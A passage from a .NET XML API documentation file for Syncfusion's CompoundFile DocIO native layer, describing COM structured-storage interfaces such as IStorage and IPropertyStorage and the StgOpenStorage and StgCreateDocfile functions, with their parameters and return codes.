            <param name="pstgPriority">Must be NULL. A non-NULL value will return STG_E_INVALIDPARAMETER.</param>
            <param name="grfMode">Specifies the access mode to use when opening the storage object. 
            For descriptions of the possible values, see STGM Constants. 
            Other modes you choose must at least specify STGM_SHARE_EXCLUSIVE when calling this method.</param>
            <param name="snbExclude">Must be NULL. A non-NULL value will return STG_E_INVALIDPARAMETER.</param>
            <param name="reserved"> Reserved for future use; must be zero. </param>
            <param name="ppstg">When successful, pointer to the location of an IStorage pointer to 
            the opened storage object. This parameter is set to NULL if an error occurs.</param>
            <returns>
            S_OK - The storage object was opened successfully. 
            E_PENDING - Asynchronous Storage only: Part or all of the storage's data is currently unavailable.
            STG_E_ACCESSDENIED - Not enough permissions to open storage object.
            STG_E_FILENOTFOUND - The storage object with the specified name does not exist.
            STG_E_INSUFFICIENTMEMORY - The storage object was not opened due to a lack of memory. 
            STG_E_INVALIDFLAG - The value specified for the grfMode parameter is not a valid STGM Constants value.
            STG_E_INVALIDFUNCTION - The specified combination of flags in the grfMode parameter is not supported.
            STG_E_INVALIDNAME - Not a valid value for pwcsName. 
            STG_E_INVALIDPOINTER - The pointer specified for the storage object was not valid.
            STG_E_INVALIDPARAMETER - One of the parameters was not valid.
            STG_E_REVERTED - The storage object has been invalidated by a revert operation above it in the transaction tree.
            STG_E_TOOMANYOPENFILES - The storage object was not created because there are too many open files.
            STG_S_CONVERTED - The existing stream with the specified name was replaced with a new storage 
            object containing a single stream called CONTENTS. In direct mode, the new storage is 
            immediately written to disk. In transacted mode, the new storage is written to a 
            temporary storage in memory and later written to disk when it is committed.
            </returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.IStorage.CopyTo(System.UInt32,System.IntPtr,System.IntPtr,Syncfusion.CompoundFile.DocIO.Native.IStorage)">
            <summary>
            The CopyTo method copies the entire contents of an open storage object to another storage object.
            </summary>
            <param name="ciidExclude">The number of elements in the array pointed to by rgiidExclude. 
            If rgiidExclude is NULL, then ciidExclude is ignored.</param>
            <param name="rgiidExclude">An array of interface identifiers (IIDs) that either the caller 
            knows about and does not want copied or that the storage object does not support but whose 
            state the caller will later explicitly copy. </param>
            <param name="snbExclude">A string name block (refer to SNB) that specifies a block of storage
            or stream objects that are not to be copied to the destination. These elements are not created 
            at the destination. If IID_IStorage is in the rgiidExclude array, this parameter is ignored. 
            This parameter may be NULL. </param>
            <param name="pstgDest">Pointer to the open storage object into which this storage object is to be copied.</param>
            <returns>
            S_OK - The storage object was successfully copied.
            E_PENDING - Asynchronous Storage only: Part or all of the data to be copied is currently unavailable.
            STG_E_ACCESSDENIED - The destination storage object is a child of the source storage object.
            STG_E_INSUFFICIENTMEMORY - The copy was not completed due to a lack of memory.
            Otherwise - Error code.
            </returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.IStorage.MoveElementTo(System.String,Syncfusion.CompoundFile.DocIO.Native.IStorage,System.String,System.UInt32)">
            <summary>
            The MoveElementTo method copies or moves a substorage or stream from this storage 
            object to another storage object.
            </summary>
            <param name="pwcsName">Pointer to a wide character null-terminated Unicode string 
            that contains the name of the element in this storage object to be moved or copied.</param>
            <param name="pstgDest"> IStorage pointer to the destination storage object.</param>
            <param name="pwcsNewName">Pointer to a wide character null-terminated unicode string 
            that contains the new name for the element in its new storage object.</param>
            <param name="grfFlags">Specifies whether the operation should be a move (STGMOVE_MOVE)
            or a copy (STGMOVE_COPY). See the STGMOVE enumeration.</param>
            <returns>S_OK - The storage object was successfully copied or moved.
            Otherwise error code.
            </returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.IStorage.Commit(System.UInt32)">
            <summary>
            The Commit method ensures that any changes made to a storage object open in transacted 
            mode are reflected in the parent storage.
            </summary>
            <param name="grfCommitFlags">Controls how the changes are committed to the storage object.</param>
            <returns>
            S_OK - Changes to the storage object were successfully committed to the parent level. 
            If STGC_CONSOLIDATE was specified, the storage was successfully consolidated, 
            or the storage was already too compact to consolidate further
            Otherwise error code.
            </returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.IStorage.Revert">
            <summary>
            The Revert method discards all changes that have been made to the storage object since the last commit operation.
            </summary>
            <returns>
            S_OK - The revert operation was successful. 
            Otherwise error code.
            </returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.IStorage.EnumElements(System.UInt32,System.IntPtr,System.UInt32,Syncfusion.CompoundFile.DocIO.Native.IEnumSTATSTG@)">
            <summary>
            The EnumElements method retrieves a pointer to an enumerator object that can be used 
            to enumerate the storage and stream objects contained within this storage object.
            </summary>
            <param name="reserved1">Reserved for future use; must be zero.</param>
            <param name="reserved2">Reserved for future use; must be zero.</param>
            <param name="reserved3">Reserved for future use; must be zero.</param>
            <param name="ppenum">Pointer to IEnumSTATSTG* pointer variable that receives the 
            interface pointer to the new enumerator object.</param>
            <returns>
            S_OK - The enumerator object was successfully returned.
            Otherwise error code.
            </returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.IStorage.DestroyElement(System.String)">
            <summary>
            The DestroyElement method removes the specified storage or stream from this storage object.
            </summary>
            <param name="pwcsName">Pointer to a wide character null-terminated Unicode string that 
            contains the name of the storage or stream to be removed.</param>
            <returns>
            S_OK - The element was successfully removed.
            Otherwise error code.
            </returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.IStorage.RenameElement(System.String,System.String)">
            <summary>
            The RenameElement method renames the specified substorage or stream in this storage object.
            </summary>
            <param name="pwcsOldName">Pointer to a wide character null-terminated Unicode string that 
            contains the name of the substorage or stream to be changed.</param>
            <param name="pwcsNewName">Pointer to a wide character null-terminated unicode string that 
            contains the new name for the specified substorage or stream.</param>
            <returns>S_OK - The element was successfully renamed.
            Otherwise error code.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.IStorage.SetElementTimes(System.String,System.Runtime.InteropServices.ComTypes.FILETIME@,System.Runtime.InteropServices.ComTypes.FILETIME@,System.Runtime.InteropServices.ComTypes.FILETIME@)">
            <summary>
            The SetElementTimes method sets the modification, access, and creation times of the 
            specified storage element, if the underlying file system supports this method.
            </summary>
            <param name="pwcsName">The name of the storage object element whose times are to be modified. 
            If NULL, the time is set on the root storage rather than one of its elements. </param>
            <param name="pctime">Either the new creation time for the element or NULL 
            if the creation time is not to be modified.</param>
            <param name="patime">Either the new access time for the element or NULL if the 
            access time is not to be modified.</param>
            <param name="pmtime">Either the new modification time for the element or NULL 
            if the modification time is not to be modified.</param>
            <returns>
            S_OK - The time values were successfully set.
            Otherwise error code.
            </returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.IStorage.SetClass(System.Guid@)">
            <summary>
            The SetClass method assigns the specified class identifier (CLSID) to this storage object.
            </summary>
            <param name="clsid">The CLSID that is to be associated with the storage object.</param>
            <returns>S_OK - The CLSID was successfully assigned.
            Otherwise error code.
            </returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.IStorage.SetStateBits(System.UInt32,System.UInt32)">
            <summary>
            The SetStateBits method stores up to 32 bits of state information in this storage object. 
            This method is reserved for future use.
            </summary>
            <param name="grfStateBits">Specifies the new values of the bits to set. No legal values are 
            defined for these bits; they are all reserved for future use and must not be used by applications.</param>
            <param name="grfMask">A binary mask indicating which bits in grfStateBits are significant in this call.</param>
            <returns>S_OK - The state information was successfully set.
            Otherwise error code.
            </returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.IStorage.Stat(Syncfusion.CompoundFile.DocIO.Native.STATSTG@,System.UInt32)">
            <summary>
            The Stat method retrieves the STATSTG structure for this open storage object.
            </summary>
            <param name="pstatstg">On return, pointer to a STATSTG structure where this 
            method places information about the open storage object. This parameter is NULL if an error occurs.</param>
            <param name="grfStatFlag">Specifies that some of the members in the STATSTG structure 
            are not returned, thus saving a memory allocation operation. 
            Values are taken from the STATFLAG enumeration.</param>
            <returns>
            S_OK - The STATSTG structure was successfully returned at the specified location.
            Otherwise error code.
            </returns>
        </member>
        <member name="T:Syncfusion.CompoundFile.DocIO.Native.IEnumSTATPROPSETSTG">
            <summary>
            The IEnumSTATPROPSETSTG interface iterates through an array of STATPROPSETSTG structures.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.IEnumSTATPROPSETSTG.Next(System.UInt32,Syncfusion.CompoundFile.DocIO.Native.tagSTATPROPSETSTG@,System.UInt32@)">
            <summary>
            The Next method retrieves a specified number of STATPROPSETSTG structures that follow 
            subsequently in the enumeration sequence.
            </summary>
            <param name="celt">The number of STATPROPSETSTG structures requested.</param>
            <param name="rgelt">An array of STATPROPSETSTG structures returned.</param>
            <param name="pceltFetched">The number of STATPROPSETSTG structures retrieved in the rgelt parameter.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.IEnumSTATPROPSETSTG.Skip(System.UInt32)">
            <summary>
            The Skip method skips a specified number of STATPROPSETSTG structures in the enumeration sequence.
            </summary>
            <param name="celt">The number of STATPROPSETSTG structures to skip.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.IEnumSTATPROPSETSTG.Reset">
            <summary>
            The Reset method resets the enumeration sequence to the beginning of the STATPROPSETSTG structure array.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.IEnumSTATPROPSETSTG.Clone(Syncfusion.CompoundFile.DocIO.Native.IEnumSTATPROPSETSTG@)">
            <summary>
            The Clone method creates an enumerator that contains the same enumeration state as the current 
            STATPROPSETSTG structure enumerator. Using this method, a client can record a particular point 
            in the enumeration sequence and then return to that point later.
            </summary>
            <param name="ppenum">A pointer to the variable that receives the IEnumSTATPROPSETSTG interface pointer.</param>
        </member>
        <member name="T:Syncfusion.CompoundFile.DocIO.Native.IEnumSTATPROPSTG">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.IEnumSTATPROPSTG.Next(System.Int32,Syncfusion.CompoundFile.DocIO.Native.tagSTATPROPSTG[],System.Int32@)">
            <summary>
            The Next method retrieves a specified number of STATPROPSTG structures, that follow subsequently 
            in the enumeration sequence. 
            </summary>
            <param name="celt">The number of STATPROPSTG structures requested.</param>
            <param name="rgelt">An array of STATPROPSTG structures returned.</param>
            <param name="pceltFetched">The number of STATPROPSTG structures retrieved in the rgelt parameter.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.IEnumSTATPROPSTG.Skip(System.UInt32)">
            <summary>
            The Skip method skips the specified number of STATPROPSTG structures in the enumeration sequence.
            </summary>
            <param name="celt">The number of STATPROPSTG structures to skip.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.IEnumSTATPROPSTG.Reset">
            <summary>
            The Reset method resets the enumeration sequence to the beginning of the STATPROPSTG structure array.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.IEnumSTATPROPSTG.Clone(Syncfusion.CompoundFile.DocIO.Native.IEnumSTATPROPSTG@)">
            <summary>
            The Clone method creates an enumerator that contains the same enumeration state as the current 
            STATPROPSTG structure enumerator
            </summary>
            <param name="ppenum">A pointer to the variable that receives the IEnumSTATPROPSTG interface pointer.</param>
        </member>
        <member name="T:Syncfusion.CompoundFile.DocIO.Native.PROPVARIANT">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.CompoundFile.DocIO.Native.IPropertyStorage">
            <summary>
            The IPropertyStorage interface manages the persistent properties of a single property set. 
            Persistent properties consist of information that can be stored persistently in a 
            property set, such as the summary information associated with a file.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.IPropertyStorage.ReadMultiple(System.UInt32,Syncfusion.CompoundFile.DocIO.Native.PROPSPEC[],Syncfusion.CompoundFile.DocIO.Native.PROPVARIANT[])">
            <summary>
            The ReadMultiple method reads specified properties from the current property set.
            </summary>
            <param name="cpspec">The numeric count of properties to be specified in the rgpspec array.</param>
            <param name="rgpspec">An array of PROPSPEC structures specifies which properties are read. 
            Properties can be specified either by a property ID or by an optional string name.</param>
            <param name="rgpropvar">Caller-allocated array of a PROPVARIANT structure that, on return, 
            contains the values of the properties specified by the corresponding elements in the rgpspec array.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.IPropertyStorage.WriteMultiple(System.UInt32,Syncfusion.CompoundFile.DocIO.Native.PROPSPEC[],Syncfusion.CompoundFile.DocIO.Native.PROPVARIANT[],System.Int32)">
            <summary>
            The WriteMultiple method writes a specified group of properties to the current property set. 
            If a property with a specified name or property identifier already exists, it is replaced, 
            even when the old and new types for the property value are different.
            </summary>
            <param name="cpspec">The number of properties set. The value of this parameter can be set to zero;</param>
            <param name="rgpspec"> An array of the property IDs (PROPSPEC) to which properties are set.</param>
            <param name="rgpropvar">An array (of size cpspec) of PROPVARIANT structures that contain the property values to be written.</param>
            <param name="propidNameFirst">The minimum value for the property IDs that the method must assign if the 
            rgpspec parameter specifies string-named properties for which no property IDs currently exist.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.IPropertyStorage.DeleteMultiple(System.UInt32,Syncfusion.CompoundFile.DocIO.Native.PROPSPEC@)">
            <summary>
            The DeleteMultiple method deletes as many of the indicated properties as exist in this property set.
            </summary>
            <param name="cpspec">The numerical count of properties to be deleted. The value of this parameter can
            legally be set to zero, however that defeats the purpose of the method as no properties are thereby 
            deleted, regardless of the value set in rgpspec. </param>
            <param name="rgpspec">Properties to be deleted. A mixture of property identifiers and string-named
            properties is permitted. There may be duplicates, and there is no requirement that properties be 
            specified in any order. </param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.IPropertyStorage.ReadPropertyNames(System.UInt32,System.UInt32@,System.String@)">
            <summary>
            The ReadPropertyNames method retrieves any existing string names for the specified property IDs.
            </summary>
            <param name="cpropid">The number of elements on input of the array rgpropid. 
            The value of this parameter can be set to zero.</param>
            <param name="rgpropid">An array of property IDs for which names are to be retrieved.</param>
            <param name="rglpwstrName">A caller-allocated array of size cpropid of LPWSTR members. 
            On return, the implementation fills in this array.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.IPropertyStorage.WritePropertyNames(System.UInt32,System.UInt32@,System.String@)">
            <summary>
            The WritePropertyNames method assigns string names to a specified array of property IDs in the current property set.
            </summary>
            <param name="cpropid">The size on input of the array rgpropid. Can be zero. 
            However, making it zero causes this method to become non-operational.</param>
            <param name="rgpropid">An array of the property IDs for which names are to be set.</param>
            <param name="rglpwstrName">Array of new names to be assigned to the corresponding property 
            IDs in the rgpropid array. These names may not exceed 255 characters (not including the NULL terminator).</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.IPropertyStorage.DeletePropertyNames(System.UInt32,System.UInt32@)">
            <summary>
            The DeletePropertyNames method deletes specified string names from the current property set.
            </summary>
            <param name="cpropid">The size on input of the array rgpropid. If 0, no property names are deleted.</param>
            <param name="rgpropid">Property identifiers for which string names are to be deleted.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.IPropertyStorage.Commit(System.UInt32)">
            <summary>
            The IPropertyStorage::Commit method saves changes made to a property storage 
            object to the parent storage object.
            </summary>
            <param name="grfCommitFlags">The flags that specify the conditions under which the commit is to be performed.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.IPropertyStorage.Revert">
            <summary>
            The Revert method discards all changes to the named property set since it was last opened or 
            discards changes that were last committed to the property set.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.IPropertyStorage.Enum(Syncfusion.CompoundFile.DocIO.Native.IEnumSTATPROPSTG@)">
            <summary>
            The Enum method creates an enumerator object designed to enumerate data of type STATPROPSTG, 
            which contains information on the current property set.
            </summary>
            <param name="ppenum">Pointer to IEnumSTATPROPSTG pointer variable that receives the interface 
            pointer to the new enumerator object.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.IPropertyStorage.SetTimes(System.Runtime.InteropServices.ComTypes.FILETIME@,System.Runtime.InteropServices.ComTypes.FILETIME@,System.Runtime.InteropServices.ComTypes.FILETIME@)">
            <summary>
            The SetTimes method sets the modification, access, and creation times of this property set, 
            if supported by the implementation. Not all implementations support all these time values.
            </summary>
            <param name="pctime">Pointer to the new creation time for the property set. May be NULL, 
            indicating that this time is not to be modified by this call.</param>
            <param name="patime">Pointer to the new access time for the property set. May be NULL, 
            indicating that this time is not to be modified by this call.</param>
            <param name="pmtime">Pointer to the new modification time for the property set. May be 
            NULL, indicating that this time is not to be modified by this call.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.IPropertyStorage.SetClass(System.Guid@)">
            <summary>
            The SetClass method assigns a new CLSID to the current property storage object, and 
            persistently stores the CLSID with the object.
            </summary>
            <param name="clsid">New CLSID to be associated with the property set.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.IPropertyStorage.Stat(Syncfusion.CompoundFile.DocIO.Native.tagSTATPROPSETSTG@)">
            <summary>
            The Stat method retrieves information about the current open property set.
            </summary>
            <param name="pstatpsstg">Pointer to a STATPROPSETSTG structure, which contains 
            statistics about the current open property set.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.IPropertyStorage.ReadMultiple(System.UInt32,Syncfusion.CompoundFile.DocIO.Native.PROPSPEC@,System.IntPtr)">
            <summary>
            The ReadMultiple method reads specified properties from the current property set.
            </summary>
            <param name="cpspec">The numeric count of properties to be specified in the rgpspec array.</param>
            <param name="rgpspec">An array of PROPSPEC structures specifies which properties are read. 
            Properties can be specified either by a property ID or by an optional string name.</param>
            <param name="rgpropvar">Caller-allocated array of a PROPVARIANT structure that, on return, 
            contains the values of the properties specified by the corresponding elements in the rgpspec array.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.IPropertyStorage.WriteMultiple(System.UInt32,Syncfusion.CompoundFile.DocIO.Native.PROPSPEC@,System.IntPtr,Syncfusion.CompoundFile.DocIO.Native.PID)">
            <summary>
            The WriteMultiple method writes a specified group of properties to the current property set. 
            If a property with a specified name or property identifier already exists, it is replaced, 
            even when the old and new types for the property value are different.
            </summary>
            <param name="cpspec">The number of properties set. The value of this parameter can be set to zero;</param>
            <param name="rgpspec"> An array of the property IDs (PROPSPEC) to which properties are set.</param>
            <param name="rgpropvar">An array (of size cpspec) of PROPVARIANT structures that contain the property values to be written.</param>
            <param name="propidNameFirst">The minimum value for the property IDs that the method must assign if the 
            rgpspec parameter specifies string-named properties for which no property IDs currently exist.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.IPropertyStorage.Commit(Syncfusion.CompoundFile.DocIO.Native.STGC)">
            <summary>
            The IPropertyStorage::Commit method saves changes made to a property storage 
            object to the parent storage object.
            </summary>
            <param name="grfCommitFlags">The flags that specify the conditions under which the commit is to be performed.</param>
        </member>
        <member name="T:Syncfusion.CompoundFile.DocIO.Native.IPropertySetStorage">
            <summary>
            The IPropertySetStorage interface creates, opens, deletes, and enumerates property set 
            storages that support instances of the IPropertyStorage interface.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.IPropertySetStorage.Create(System.Guid@,System.Guid@,System.UInt32,Syncfusion.CompoundFile.DocIO.Native.STGM,Syncfusion.CompoundFile.DocIO.Native.IPropertyStorage@)">
            <summary>
            The Create method creates and opens a new property set in the property set storage object.
            </summary>
            <param name="rfmtid">The FMTID of the property set to be created. For information about 
            FMTIDs that are well-known and predefined in the Platform SDK, see Predefined Property Set 
            Format Identifiers. </param>
            <param name="pclsid"> A pointer to the initial class identifier CLSID for this property set. 
            May be NULL, in which case it is set to all zeroes.</param>
            <param name="grfFlags">The values from PROPSETFLAG Constants.</param>
            <param name="grfMode">An access mode in which the newly created property set is to be opened, 
            taken from certain values of STGM_Constants, as described in the following Remarks section.</param>
            <param name="ppprstg">A pointer to the output variable that receives the IPropertyStorage interface pointer.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.IPropertySetStorage.Open(System.Guid@,Syncfusion.CompoundFile.DocIO.Native.STGM,Syncfusion.CompoundFile.DocIO.Native.IPropertyStorage@)">
            <summary>
            The Open method opens a property set contained in the property set storage object.
            </summary>
            <param name="rfmtid">The format identifier (FMTID) of the property set to be opened. 
            For more information about well-known and predefined FMTIDs in the Platform SDK</param>
            <param name="grfMode">The access mode in which the newly created property set is to be 
            opened. These flags are taken from STGM Constants.</param>
            <param name="ppprstg">A pointer to the IPropertyStorage pointer variable that receives 
            the interface pointer to the requested property storage subobject.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.IPropertySetStorage.Delete(System.Guid@)">
            <summary>
            The Delete method deletes one of the property sets contained in the property set storage object.
            </summary>
            <param name="rfmtid">FMTID of the property set to be deleted.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.IPropertySetStorage.Enum(Syncfusion.CompoundFile.DocIO.Native.IEnumSTATPROPSETSTG@)">
            <summary>
            The Enum method creates an enumerator object which contains information on the 
            property sets stored in this property set storage.
            </summary>
            <param name="ppenum">Pointer to IEnumSTATPROPSETSTG pointer variable that 
            receives the interface pointer to the newly created enumerator object.</param>
        </member>
        <member name="T:Syncfusion.CompoundFile.DocIO.Native.API">
            <summary>
            Class provide access to STG API functions.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.API.#ctor">
            <summary>
            To prevent user from creation of this class instances.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.API.StgOpenStorage(System.String,System.IntPtr,Syncfusion.CompoundFile.DocIO.Native.STGM,System.IntPtr,System.UInt32,Syncfusion.CompoundFile.DocIO.Native.IStorage@)">
            <summary>
            StgOpenStorage opens an existing root storage object in the file system. You
            can use this function to open compound files but you cannot use it to open
            directories, files, or summary catalogs. Nested storage objects can only be
            opened using their parents' IStorage::OpenStorage method.
            </summary>
            <param name="wcsName">[in] Pointer to the path of the NULL-terminated
            Unicode string file containing the storage object to open. This parameter
            is ignored if the pstgPriority parameter is not NULL.</param>
            <param name="stgPriority">Most often NULL. If not NULL, this parameter is
            used instead of the pwcsName parameter to specify the pointer to the
            IStorage interface on the storage object to open. It points to a previous
            opening of a root storage object, most often one that was opened in priority
            mode. After the StgOpenStorage function returns, the storage object specified
            in the pstgPriority parameter on function entry is not valid and can no
            longer be used. Instead, use the storage object specified in the ppStgOpen
            parameter.</param>
            <param name="grfMode">Specifies the access mode to use to open the
            storage object.</param>
            <param name="snbExclude">If not NULL, pointer to a block of elements in
            the storage that are to be excluded as the storage object is opened. The
            exclusion occurs regardless of whether a snapshot copy happens on the open.
            May be NULL.</param>
            <param name="reserved">Indicates reserved for future use; must be zero.</param>
            <param name="storage">[out] Pointer IStorage* pointer variable that receives
            the interface pointer to the opened storage.</param>
            <returns>
            S_OK
            Indicates that the storage object was successfully opened.
            STG_E_FILENOTFOUND
            Indicates that the specified file does not exist.
            STG_E_ACCESSDENIED
            Access denied because the caller does not have enough permissions, or another caller
            has the file open and locked.
            STG_E_LOCKVIOLATION
            Access denied because another caller has the file open and locked.
            STG_E_SHAREVIOLATION
            Access denied because another caller has the file open and locked.
            STG_E_FILEALREADYEXISTS
            Indicates that the file exists but is not a storage object.
            STG_E_TOOMANYOPENFILES
            Indicates that the storage object was not opened because there are too many open files.
            STG_E_INSUFFICIENTMEMORY
            Indicates that the storage object was not opened due to inadequate memory.
            STG_E_INVALIDNAME
            Indicates a non-valid name in the pwcsName parameter.
            STG_E_INVALIDPOINTER
            Indicates a non-valid pointer in one of the parameters: snbExclude, pwcsName,
            pstgPriority, or ppStgOpen.
            STG_E_INVALIDFLAG
            Indicates a non-valid flag combination in the grfMode parameter.
            STG_E_INVALIDFUNCTION
            Indicates STGM_DELETEONRELEASE specified in the grfMode parameter.
            STG_E_OLDFORMAT
            Indicates that the storage object being opened was created by the Beta 1 storage
            provider. This format is no longer supported.
            STG_E_NOTSIMPLEFORMAT
            Indicates that the STGM_SIMPLE flag was specified in the grfMode parameter and the
            storage object being opened was not written in simple mode.
            STG_E_OLDDLL
            The DLL being used to open this storage object is a version of the DLL that is older
            than the one used to create it.
            STG_E_PATHNOTFOUND
            Specified path does not exist.
            STG_E_SHAREVIOLATION
            Access denied because another caller has the file open and locked.
            </returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.API.StgOpenStorageEx(System.String,Syncfusion.CompoundFile.DocIO.Native.STGM,Syncfusion.CompoundFile.DocIO.Native.STGFMT,System.UInt32,System.IntPtr,System.IntPtr,System.Guid@,Syncfusion.CompoundFile.DocIO.Native.IStorage@)">
            <summary>
            Opens an existing root storage object in the file system. You can use this function
            to open compound files and regular files. To create a new file, use the
            StgCreateStorageEx function.
            </summary>
            <param name="pwcsName">[in] Pointer to the path of the NULL-terminated Unicode
            string file containing the storage object. This string size must not exceed
            MAX_PATH characters.</param>
            <param name="grfMode">[in] Specifies the access mode to open the new storage object.
            For more information, see the STGM enumeration. If the caller specifies transacted
            mode together with STGM_CREATE or STGM_CONVERT, the overwrite or conversion takes
            place when the commit operation is called for the root storage. If IStorage::Commit
            is not called for the root storage object, previous contents of the file will be
            restored. STGM_CREATE and STGM_CONVERT cannot be combined with the STGM_NOSNAPSHOT
            flag, because a snapshot copy is required when a file is overwritten or converted
            in the transacted mode. </param>
            <param name="stgfmt">[in] Specifies the storage file format. For more information,
            see the STGFMT enumeration.</param>
            <param name="grfAttrs">[in] Depends on the value of the stgfmt parameter.
            STGFMT_DOCFILE should be zero (0) or FILE_FLAG_NO_BUFFERING.</param>
            <param name="stgOptions">[in, out] Pointer to a STGOPTIONS structure that contains
            information about the storage object being opened. The pStgOptions parameter is
            valid only if the stgfmt parameter is set to STGFMT_DOCFILE.</param>
            <param name="reserved2">[in] Reserved for future use; must be zero.</param>
            <param name="riid">[in] Specifies the Guid of the interface pointer to return.</param>
            <param name="ppObjectOpen">[out] Address of an interface pointer variable that
            receives a pointer for an interface on the storage object being opened; contains
            NULL if operation failed.</param>
            <returns>
            S_OK
            Indicates that the storage object was successfully opened.
            STG_E_INVALIDPOINTER
            Indicates a non-valid pointer in the ppObjectOpen parameter.
            STG_E_INVALIDPARAMETER
            Indicates a non-valid value for the grfAttrs, reserved1, reserved2, grfMode, or
            stgfmt parameters. Can occur if the FILE_FLAG_NO_BUFFERING flag is specified for
            grfAttrs but the sector size of the file is not an integer multiple of the
            underlying disk's sector size.
            E_NOINTERFACE
            Indicates that the specified interface is not supported.
            STG_E_INVALIDFLAG
            Indicates a non-valid flag combination in the grfMode pointer (includes both
            STGM_DELETEONRELEASE and STGM_CONVERT flags).
            STG_E_INVALIDNAME
            Indicates a non-valid name in the pwcsName parameter.
            STG_E_INVALIDFUNCTION
            Indicates that the grfMode is set to STGM_DELETEONRELEASE.
            STG_E_LOCKVIOLATION
            Access denied because another caller has the file open and locked.
            STG_E_SHAREVIOLATION
            Access denied because another caller has the file open and locked.
            STG_E_UNIMPLEMENTEDFUNCTION
            Indicates that the StgOpenStorageEx function is not implemented by the operating
            system. In this case, use the StgOpenStorage function instead.
            STG_E_INCOMPLETE
            Indicates that the file could not be opened because it is on a high-latency device.
            This can only occur if the parameter is IID_IPropertySetStorage, and the
            stgfmt parameter is STGFMT_FILE.
            STG_E_ACCESSDENIED
            Indicates that the file could not be opened because the underlying storage device
            does not allow such access to the current user. When opening the storage object
            in transacted mode (STGM_TRANSACTED), this error may also indicate that a temporary
            file could not be created in the temporary directory as specified by the
            GetTempPath function. The GetTempPath function retrieves the path of the directory
            designated for temporary files.
            </returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.API.StgCreateDocfile(System.String,Syncfusion.CompoundFile.DocIO.Native.STGM,System.UInt32,Syncfusion.CompoundFile.DocIO.Native.IStorage@)">
            <summary>
            StgCreateDocfile creates a new compound file storage object using the COM-provided
            compound file implementation for the IStorage interface.
            </summary>
            <param name="pwcsName">[in] Pointer to a NULL-terminated Unicode string name for the
            compound file being created. It is passed uninterpreted to the file system. This can
            be a relative name or NULL. If NULL, a temporary compound file is allocated with a
            unique name.</param>
            <param name="grfMode">[in] Specifies the access mode to use when opening the new
            storage object. For more information, see the STGM enumeration. If the caller
            specifies transacted mode together with STGM_CREATE or STGM_CONVERT, the overwrite
            or conversion takes place when the commit operation is called for the root storage.
            If IStorage::Commit is not called for the root storage object, previous contents of
            the file will be restored. STGM_CREATE and STGM_CONVERT cannot be combined with
            the STGM_NOSNAPSHOT flag, because a snapshot copy is required when a file is
            overwritten or converted in the transacted mode.</param>
            <param name="reserved">[in] Reserved for future use; must be zero.</param>
            <param name="ppstgOpen">[out] Pointer to the location of the IStorage pointer to
            the new storage object.</param>
            <returns>
            S_OK - Indicates that the compound file was successfully created.
            STG_E_ACCESSDENIED - Access denied because the caller does not have enough permissions
            or another caller has the file open and locked.
            STG_E_FILEALREADYEXISTS
            Indicates that the compound file already exists and grfMode is set to STGM_FAILIFTHERE.
            STG_E_INSUFFICIENTMEMORY
            Indicates that the compound file was not created due to inadequate memory.
            STG_E_INVALIDFLAG
            Indicates a non-valid flag combination in the grfMode parameter.
            STG_E_INVALIDNAME
            Indicates a non-valid name in the pwcsName parameter.
            STG_E_INVALIDPOINTER
            Indicates a non-valid pointer in the pwcsName parameter or the ppStgOpen parameter.
            STG_E_LOCKVIOLATION
            Access denied because another caller has the file open and locked.
            STG_E_SHAREVIOLATION
            Access denied because another caller has the file open and locked.
            STG_E_TOOMANYOPENFILES
            Indicates that the compound file was not created due to a lack of file handles.
            STG_S_CONVERTED
            Indicates that the specified file was successfully converted to storage format.
            </returns>
        </member>
